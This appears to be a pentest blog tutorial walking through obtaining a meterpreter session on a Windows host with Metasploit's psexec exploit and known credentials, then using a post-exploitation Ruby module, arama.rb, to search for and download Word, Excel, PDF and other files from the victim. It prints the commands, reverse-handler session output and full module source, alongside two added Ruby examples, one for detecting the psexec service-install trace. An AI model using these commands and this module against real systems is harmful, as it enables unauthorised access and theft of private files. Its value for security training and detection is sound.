5 November 2012

Gathering Files Over a Meterpreter Session

Posted by: Fırat Celal Erdik, 5 November 2012

This article covers an easy way to collect files with chosen extensions from a victim machine on which a meterpreter session has already been obtained with Metasploit. The script that does this is written in Ruby and runs as a Metasploit module; it is named arama.rb. First, the script must be copied into the Metasploit installation directory:
root@bt:~# cp arama.rb /opt/framework3/msf3/modules/post/windows/gather/

After arama.rb has been copied into that directory, Metasploit is started with the msfconsole command.
root@bt:~# msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|
+       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
Because the module requires an existing meterpreter session, we first need to obtain one. In this article a meterpreter session is obtained with the psexec exploit against a system whose username and password we know. You can obtain a meterpreter session through any vulnerability.

The command to select this exploit is as follows:
msf > use exploit/windows/smb/psexec 
The show options command is used to display the exploit's parameters and other details.
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

After supplying the victim machine's IP address, username and password as parameters to the psexec exploit, a meterpreter session is obtained with the exploit command.
msf exploit(psexec) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf exploit(psexec) > set SMBUser celal
SMBUser => celal
msf exploit(psexec) > set SMBPass celal
SMBPass => celal
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.102:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'celal'...
[*] Uploading payload...
[*] Created \qxijEZlY.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (qelbKxTM - "MNxd")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.101
[*] Closing service handle...
[*] Deleting \qxijEZlY.exe...
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-03 18:31:18 +0200
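The console output above also shows what this technique leaves behind on the target: an executable with a random eight-letter name is uploaded to the ADMIN$ share, a service with another random eight-letter name is created, started and then removed. On Windows, a service installation is recorded in the System event log as Event ID 7045. The following Ruby snippet is an added example, not part of the original post or of arama.rb; it shows how a defender might flag such records. The event records it parses are constructed for the example and use a simplified pipe-separated layout (event id, service name, image path, account), not the real event text.

```ruby
# Added example (not from the original post): flag "service installed"
# records (Event ID 7045) that look like the psexec trace shown above:
# an eight-letter random service name pointing at an eight-letter random
# executable dropped directly under the Windows directory.

SERVICE_INSTALLED = 7045

# Constructed sample records, one per line:
# "<event_id>|<service name>|<image path>|<account>"
# The first line mirrors the names seen in the session output above.
SAMPLE_EVENTS = <<~LOG
  7045|qelbKxTM|C:\\Windows\\qxijEZlY.exe|LocalSystem
  7045|Spooler|C:\\Windows\\System32\\spoolsv.exe|LocalSystem
  7036|qelbKxTM||
  7045|WinDefend|"C:\\Program Files\\Windows Defender\\MsMpEng.exe"|LocalSystem
LOG

# Heuristic: exactly eight letters, no digits, as in qelbKxTM / qxijEZlY.
RANDOM_NAME = /\A[A-Za-z]{8}\z/

def parse_events(text)
  text.each_line.map do |line|
    id, name, image, account = line.chomp.split("|", 4)
    { id: id.to_i, name: name, image: image.to_s.delete('"'), account: account }
  end
end

# True when a record is a service install whose service name AND executable
# base name both match the random-name pattern. Requiring both keeps legitimate
# eight-letter services (e.g. Dnscache -> svchost.exe) from being flagged.
def suspicious_service_install?(ev)
  return false unless ev[:id] == SERVICE_INSTALLED
  return false unless ev[:image].match?(/\.exe\z/i)
  exe_base = File.basename(ev[:image].tr("\\", "/"), ".*")
  ev[:name].match?(RANDOM_NAME) && exe_base.match?(RANDOM_NAME)
end

def flag_psexec_like(text)
  parse_events(text).select { |ev| suspicious_service_install?(ev) }
end

if __FILE__ == $0
  flag_psexec_like(SAMPLE_EVENTS).each do |ev|
    puts "suspicious service install: #{ev[:name]} -> #{ev[:image]}"
  end
end
```

Run with `ruby detect_7045.rb`; only the first constructed record is reported. The name pattern is deliberately narrow and will miss anything that renames the service, so in practice it should be one signal among several (a 7045 followed shortly by service removal, a service image outside System32, and so on).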
The background command is issued so that the captured session keeps running in the background while we continue using Metasploit. Then the post-exploitation module arama.rb is selected.
meterpreter > background
msf exploit(psexec) > use post/windows/gather/arama
msf post(arama) > show options

Module options (post/windows/gather/arama):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_TYPE                     no        Search for a specific file type based on extension. Ex *.gnmap, *.nbe
   GETDOC       false            no        Search and download all .doc files.
   GETDOCX      false            no        Search and download all .docx files.
   GETDRIVES    false            no        Search for a list of drives and display drive letters.
   GETPDF       false            no        Search and download all .pdf files.
   GETXLS       false            no        Search and download all .xls files.
   GETXLSX      false            no        Search and download all .xlsx files.
   SEARCH_FROM                   no        Search from a specified location. Ex. C:\, Run GETDRIVES first.
   SESSION                       yes       The session to run this module on.
A brief description of the module parameters:
· FILE_TYPE takes a file name or extension pattern and searches for matching files (*.gif, password.*, *kullanicilar*.xls, etc.).
· Setting GETDOC to true finds files with the .DOC extension.
· Setting GETDOCX to true finds files with the .DOCX extension.
· Setting GETDRIVES to true lists the drives on the system (C, D, etc.).
· Likewise, setting GETPDF to true finds PDF files, and setting GETXLS and GETXLSX to true finds Excel files.
· Setting SEARCH_FROM to a drive (C:\, D:\, etc.) restricts the search to that location.

Now let us find and download the .DOC files on the victim machine:
msf post(arama) > set GETDOC true
GETDOC => true
msf post(arama) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.

As the error shows, an ID must be supplied for the SESSION parameter; that is, we must have a meterpreter session waiting in the background. The following command lists the existing sessions.
msf post(arama) > sessions -i

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBGA  192.168.1.102:4444 -> 192.168.1.101:1059
Now, giving 1 as the session ID for the SESSION parameter, let us grab the .DOC files on the victim system.
msf post(arama) > set SESSION 1
SESSION => 1
msf post(arama) > set GETDOC true
GETDOC => true
msf post(arama) > exploit

[*]             Searching for and downloading Office Word documents...
[*]
[*] Downloading C:\Documents and Settings\celal\Desktop\1720_63303.docx
[*] Downloading C:\Documents and Settings\celal\Templates\winword.doc
[*] Downloading C:\Documents and Settings\celal\Templates\winword2.doc
[*] Done!
[*] Post module execution completed
To stop a search that is currently enabled, assign false to the corresponding parameter with the set command. Now let us set GETDOC to false so that .DOC files are not searched again, set GETDOCX to true to find .DOCX files, and collect them.
msf post(arama) > set GETDOC false
GETDOC => false
msf post(arama) > set GETDOCX true
GETDOCX => true
msf post(arama) > exploit

[*]             Searching for and downloading Office 2007+ Word documents...
[*]
[*] Downloading C:\Documents and Settings\celal\Desktop\1720_63303.docx
[*] Done!
[*] Post module execution completed
Likewise, if we want to find PDF files:

msf post(arama) > set GETDOCX false
GETDOCX => false
msf post(arama) > set GETPDF true
GETPDF => true
msf post(arama) > exploit

[*]             Searching for and downloading Adobe pdf files...
[*]
[*] Downloading C:\Documents and Settings\celal\Desktop\acikkodvpn.pdf
[*] Done!
[*] Post module execution completed
Now let us find and download only the .GIF image files on the victim machine's C drive:
msf post(arama) > set SEARCH_FROM C:\
SEARCH_FROM => C:\
msf post(arama) > set FILE_TYPE *.GIF
FILE_TYPE => *.GIF
msf post(arama) > exploit

[*]             Searching for and downloading gif image files...
[*]
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\45ELNN7Z\chkmk_clrbkgrd[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\45ELNN7Z\plusCold[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\EVHXNJDD\important[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\EVHXNJDD\ua[1].gif
[*] Downloading C:\Documents and Settings\celal\Local Settings\Temporary Internet Files\Content.IE5\FMEH1ROV\endnode[1].gif
[*] Downloading C:\Program Files\Common Files\Microsoft Shared\Stationery\aleabanr.gif
[*] Downloading C:\Program Files\Common Files\Microsoft Shared\Stationery\tech.gif
[*] Downloading C:\Program Files\Messenger\logowin.gif
[*] Post module execution completed
msf post(arama) >
Note: files found by the module are downloaded into the /tmp directory.
The contents of arama.rb are as follows:
require 'msf/core'
require 'msf/core/post/file'

class Metasploit3 < Msf::Post

  include Msf::Post::File

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather Docs',
      'Description'   => %q{ This module gathers specific files from user directories. },
      'License'       => BSD_LICENSE,
      'Author'        => [ '3vi1john Jbabio@me.com'],
      'Version'       => '$Revision: 20 $',
      'Platform'      => [ 'windows' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptBool.new(  'GETDOC',   [ false, 'Search and download all .doc files.', false]),
        OptBool.new(  'GETDOCX',   [ false, 'Search and download all .docx files.', false]),
        OptBool.new(  'GETXLS',   [ false, 'Search and download all .xls files.', false]),
        OptBool.new(  'GETXLSX',   [ false, 'Search and download all .xlsx files.', false]),
        OptBool.new(  'GETPDF',   [ false, 'Search and download all .pdf files.', false]),
        OptBool.new(  'GETDRIVES', [ false, 'Search for a list of drives and display drive letters.', false]),
        OptString.new(  'SEARCH_FROM', [ false, 'Search from a specified location. Ex. C:\\, Run GETDRIVES first.']),
        OptString.new(  'FILE_TYPE', [ false, 'Search for a specific file type based on extension. Ex *.gnmap, *.nbe'])
      ], self.class)
  end

  def get_drives
    ## All Credit Goes to mubix for this railgun-FU
    # GetLogicalDrives returns a bitmask: bit 0 = A:, bit 1 = B:, ... bit 25 = Z:
    a = client.railgun.kernel32.GetLogicalDrives()["return"]
    drives = []
    letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    (0..25).each do |i|
      test = letters[i,1]
      rem = a % (2**(i+1))   # non-zero iff bit i is still set in a
      if rem > 0
        drives << test
        a = a - rem          # clear bit i so the next modulo isolates bit i+1
      end
    end
    print_status("Drives Available = #{drives.inspect}")
  end

  # Each download_* method searches for one pattern. The search root is
  # SEARCH_FROM if given, otherwise the profile directory for the OS family.
  def download_doc_files
    location = datastore['SEARCH_FROM']
    file_type = "*.doc"
    dest = "/tmp"
    sysnfo = client.sys.config.sysinfo['OS']
    if datastore['SEARCH_FROM']
      getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
    elsif sysnfo =~ /Windows XP|2003|.NET/
      getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
    else  # Windows Vista / 7 / 2008 and newer keep profiles under C:\Users
      getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
    end
    getfile.each do |file|
      print_status("Downloading #{file['path']}\\#{file['name']}")
      client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
    end
  end

  def download_docx_files
    location = datastore['SEARCH_FROM']
    file_type = "*.docx"
    dest = "/tmp"
    sysnfo = client.sys.config.sysinfo['OS']
    if datastore['SEARCH_FROM']
      getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
    elsif sysnfo =~ /Windows XP|2003|.NET/
      getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
    else  # Windows Vista / 7 / 2008 and newer
      getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
    end
    getfile.each do |file|
      print_status("Downloading #{file['path']}\\#{file['name']}")
      client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
    end
  end

  def download_xls_files
    location = datastore['SEARCH_FROM']
    file_type = "*.xls"
    dest = "/tmp"
    sysnfo = client.sys.config.sysinfo['OS']
    if datastore['SEARCH_FROM']
      getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
    elsif sysnfo =~ /Windows XP|2003|.NET/
      getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
    else  # Windows Vista / 7 / 2008 and newer
      getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
    end
    getfile.each do |file|
      print_status("Downloading #{file['path']}\\#{file['name']}")
      client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
    end
  end

  def download_xlsx_files
    location = datastore['SEARCH_FROM']
    file_type = "*.xlsx"
    dest = "/tmp"
    sysnfo = client.sys.config.sysinfo['OS']
    if datastore['SEARCH_FROM']
      getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
    elsif sysnfo =~ /Windows XP|2003|.NET/
      getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
    else  # Windows Vista / 7 / 2008 and newer
      getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
    end
    getfile.each do |file|
      print_status("Downloading #{file['path']}\\#{file['name']}")
      client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
    end
  end

  def download_pdf_files
    location = datastore['SEARCH_FROM']
    file_type = "*.pdf"
    dest = "/tmp"
    sysnfo = client.sys.config.sysinfo['OS']
    if datastore['SEARCH_FROM']
      getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
    elsif sysnfo =~ /Windows XP|2003|.NET/
      getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
    else  # Windows Vista / 7 / 2008 and newer
      getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
    end
    getfile.each do |file|
      print_status("Downloading #{file['path']}\\#{file['name']}")
      client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
    end
  end

  # User-defined pattern taken from FILE_TYPE (e.g. *.gif, password.*)
  def download_ud_files
    location = datastore['SEARCH_FROM']
    file_type = datastore['FILE_TYPE']
    dest = "/tmp"
    sysnfo = client.sys.config.sysinfo['OS']
    if datastore['SEARCH_FROM']
      getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)
    elsif sysnfo =~ /Windows XP|2003|.NET/
      getfile = client.fs.file.search("C:\\Documents and Settings",file_type,recurse=true,timeout=-1)
    else  # Windows Vista / 7 / 2008 and newer
      getfile = client.fs.file.search("C:\\Users",file_type,recurse=true,timeout=-1)
    end
    getfile.each do |file|
      print_status("Downloading #{file['path']}\\#{file['name']}")
      client.fs.file.download(dest, "#{file['path']}\\#{file['name']}")
    end
  end

  def run
    begin
      if datastore['GETDRIVES']
        get_drives
      end
      if datastore['GETDOC']
        print_status("\tSearching for and downloading Office Word documents...")
        print_status("")
        download_doc_files
      end
      if datastore['GETDOCX']
        print_status("\tSearching for and downloading Office 2007+ Word documents...")
        print_status("")
        download_docx_files
      end
      if datastore['GETXLS']
        print_status("\tSearching for and downloading Office Excel spreadsheets...")
        print_status("")
        download_xls_files
      end
      if datastore['GETXLSX']
        print_status("\tSearching for and downloading Office 2007+ Excel spreadsheets...")
        print_status("")
        download_xlsx_files
      end
      if datastore['GETPDF']
        print_status("\tSearching for and downloading Adobe pdf files...")
        print_status("")
        download_pdf_files
      end
      if datastore['FILE_TYPE']
        download_ud_files
      end
      print_status("Done!")
    rescue ::Exception => e
      print_status("The following Error was encountered: #{e.class} #{e}")
    end
  end
end
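Two parts of the module can be understood without a meterpreter session: the way get_drives turns the bitmask returned by GetLogicalDrives into drive letters, and the way every download_* method picks its search root (SEARCH_FROM first, then the profile directory for the OS family reported by sysinfo). The Ruby below is an added example, not part of arama.rb; it lifts both pieces of logic into plain functions so they can be run and checked offline. The function names drive_letters, drive_letters_modulo and search_root and the sample mask are this example's own.

```ruby
# Added example (not part of arama.rb): the module's drive-mask decoding and
# search-root selection as stand-alone functions, runnable without Metasploit.

DRIVE_LETTERS = ("A".."Z").to_a

# GetLogicalDrives returns a 26-bit mask: bit 0 = A:, bit 1 = B:, ..., bit 25 = Z:.
# This reproduces the module's get_drives arithmetic: the modulo by 2**(i+1)
# is non-zero only if bit i is still set, and subtracting it clears that bit.
def drive_letters_modulo(mask)
  a = mask
  drives = []
  (0..25).each do |i|
    rem = a % (2**(i + 1))
    if rem > 0
      drives << DRIVE_LETTERS[i]
      a -= rem
    end
  end
  drives
end

# Same result using Ruby's Integer#[] bit accessor, which is the clearer form.
def drive_letters(mask)
  (0..25).select { |i| mask[i] == 1 }.map { |i| DRIVE_LETTERS[i] }
end

# Search root used by the module's download_* methods: an explicit SEARCH_FROM
# wins; otherwise XP/2003-era systems are searched under "Documents and
# Settings" and everything else under "Users".
def search_root(search_from, os)
  if search_from
    search_from
  elsif os =~ /Windows XP|2003|.NET/
    "C:\\Documents and Settings"
  else
    "C:\\Users"
  end
end

if __FILE__ == $0
  mask = 0b1101  # constructed value: A:, C: and D: present, B: absent
  puts "Drives Available = #{drive_letters(mask).inspect}"
  puts search_root(nil, "Windows XP (Build 2600, Service Pack 3).")
  puts search_root("D:\\", "Windows 7 (Build 7601, Service Pack 1).")
end
```

Note that the OS strings used here are constructed to look like sysinfo output; the match only depends on the substrings the module's regular expression looks for. Any OS string that does not mention XP, 2003 or .NET falls through to C:\Users, which is the module's behaviour as well.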


Misuse of the articles is the user's responsibility. | networkpentest.net. Powered by Blogger.